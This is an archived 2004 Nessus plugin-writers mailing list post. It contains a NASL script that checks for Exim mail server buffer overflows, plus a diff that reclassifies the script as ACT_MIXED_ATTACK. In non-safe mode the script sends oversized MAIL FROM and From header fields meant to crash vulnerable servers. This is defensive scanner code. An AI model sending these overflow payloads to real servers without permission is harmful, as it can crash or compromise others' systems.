[Plugins-writers] Change Script category for exim_mult_overflow.nasl

• Previous message: Renaud Deraison: "Re: [Plugins-writers] Checking Windows Patches Using Registry"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

I have updated the category.

Regards

-- 
Sarju Bhagat
Software Engineer
Westpoint Limited
Albion Wharf, 19 Albion Street,
Manchester, M1 5LN
England
Tel: +44 (0)161 237 1028
Fax: +44 (0)161 237 1031
email: sarju@private
web: www.westpoint.ltd.uk 



#
# (C) Tenable Network Security
#

if(description)
{
 script_id(12232);
 script_version ("$Revision: 1.5 $");

 name["english"] = "Exim Multiple Overflows";
 script_name(english:name["english"]);

 desc["english"] = "
The remote host is running a version of the Exim MTA which is vulnerable
to several remote buffer overflows.  Specifically, if either
'headers_check_syntax' or 'sender_verify = true' is in the exim.conf
file, then a remote attacker may be able to execute a classic stack-
based overflow and gain inappropriate access to the machine.

*** If you are running checks with safe_checks enabled, this may be a
false positive as only banners were used to assess the risk! ***

It is known that Exim 3.35 and 4.32 are vulnerable.

Solution : Upgrade to Exim latest version

Risk Factor : High";

 script_description(english:desc["english"]);


 summary["english"] = "Exim Multiple Overflows";
 script_summary(english:summary["english"]);

 script_category(ACT_MIXED_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");


 family["english"] = "SMTP problems";
 family["francais"] = "Problèmes SMTP";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");

 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

include("smtp_func.inc");
port = get_kb_item("Services/smtp");
if(!port) port = 25;
if (! get_port_state(port)) exit(0);

banner = get_smtp_banner(port:port);
if(!banner)exit(0);
if (! egrep(string:banner, pattern:"Exim") ) exit(0);


if (safe_checks()) {
    if(egrep(pattern:"220.*Exim ([0-2]\.|3\.([0-2][0-9]|3[0-5])|4\.([0-2][0-9]|3[0-2]))", string:banner))
        security_hole(port);
    exit(0);
} else {
    soc = open_sock_tcp(port);
    if (!soc) exit(0);
    banner = smtp_recv_line(socket:soc);
    if ( ! banner ) exit(0);

    req = string("HELO x.x.x.x\r\n");
    req += string("MAIL FROM: ", crap(300), "@nessus.org\r\n\r\n");
    req += string("RCPT TO: web@localhost\r\n");
    req += string("DATA\r\n");
    req += string("blahblah\r\n.\r\nQUIT\r\n");
    send(socket:soc, data:req);
    r = recv_line(socket:soc, length:512);
    if (!r) { security_hole(port); exit(0); }
    close(soc);

    # non-safe check # 2
    req = string("HELO x.x.x.x\r\n");
    req += string("MAIL FROM: nessus@private\r\n");
    req += string("RCPT TO: web@localhost\r\n");
    req += string("DATA\r\n");
    req += string("From", crap(data:" ", length:275), ":nessus\r\n");
    req += string("blahblah\r\n.\r\nQUIT\r\n");
    soc = open_sock_tcp(port);
    if (!soc) { security_hole(port); exit(0); }
    banner = smtp_recv_line(socket:soc);
    if ( ! banner ) exit(0);
    send(socket:soc, data:req);
    r = recv_line(socket:soc, length:512);
    if (!r) { security_hole(port); exit(0); }
    close (soc);

    # non-safe check # 3
    req = string("HELO x.x.x.x\r\n");
    req += string("MAIL FROM: nessus@private\r\n");
    req += string("RCPT TO: web@localhost\r\n");
    req += string("DATA\r\n");
    req += string("From", crap(data:" ", length:275), ":nessus\r\n");
    req += string("blahblah\r\n.\r\nQUIT\r\n");
    soc = open_sock_tcp(port);
    if (!soc) { security_hole(port); exit(0); }
    banner = smtp_recv_line(socket:soc);
    if ( ! banner ) exit(0);
    send(socket:soc, data:req);
    r = recv_line(socket:soc, length:512);
    if (!r) { security_hole(port); exit(0); }
    close (soc);
    exit(0);
}





*** plugins/exim_mult_overflow.nasl	Sat May  8 15:30:14 2004
--- exim_mult_overflow.nasl	Mon May 17 15:53:27 2004
***************
*** 32,38 ****
   summary["english"] = "Exim Multiple Overflows";
   script_summary(english:summary["english"]);
   
!  script_category(ACT_GATHER_INFO);
   
   script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
   
--- 32,38 ----
   summary["english"] = "Exim Multiple Overflows";
   script_summary(english:summary["english"]);
  
!  script_category(ACT_MIXED_ATTACK);
  
   script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
  


_______________________________________________
Plugins-writers mailing list
Plugins-writers@private
http://mail.nessus.org/mailman/listinfo/plugins-writers

• Next message: hallnk@private: "RE: [Plugins-writers] Checking Windows Patches Using Registry"
• Previous message: Renaud Deraison: "Re: [Plugins-writers] Checking Windows Patches Using Registry"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 18 2004 - 07:18:35 PDT